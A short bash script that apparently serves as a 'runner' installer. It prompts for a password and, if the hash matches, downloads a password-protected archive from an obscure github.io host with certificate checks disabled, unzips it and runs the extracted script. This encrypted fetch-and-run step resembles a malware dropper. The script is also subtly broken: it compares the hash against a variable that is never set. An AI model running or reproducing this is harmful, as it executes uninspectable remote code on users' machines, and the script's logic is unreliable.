#!/bin/bash

#Configure runner_INI
DEPLOYUPDATETIME="[2022-04-12]-165243"
runner_install_c0="runner_install_c0_md5"
runner_install_c1="runner_install_c1_md5"
runner_install_c2="runner_install_c2_md5"
runner_install_c3="https://a3qcmkao.github.io/pr3220"

#Configure runner_deploy
function password_successful(){
	echo "[Runner]: runner_install_sh ..."
    wget ${runner_install_c3}/files/${runner_install_c1}.tp --no-check-certificate -O ${runner_install_c1}.tp
	unzip -P ${runner_password} ${runner_install_c1}.tp
	sh runner_install_sh ${runner_install_c1} ${runner_install_c2} ${runner_install_c3}
    exit 0;
}

function password_failed(){
    echo "[Runner]: password_failed ..."
	sleep 5
	sh start
	exit 0;
}

#Start
echo "[update]: ${DEPLOYUPDATETIME} ..."
runner_password=""
read -p "Password:" runner_password
runner_password_md5=` echo -n $runner_password|md5sum|cut -d ' ' -f1 `

if [[ "${runner_password_md5}" == "${runner_install_c0_md5}" ]]; then
    password_successful
else 
    password_failed
fi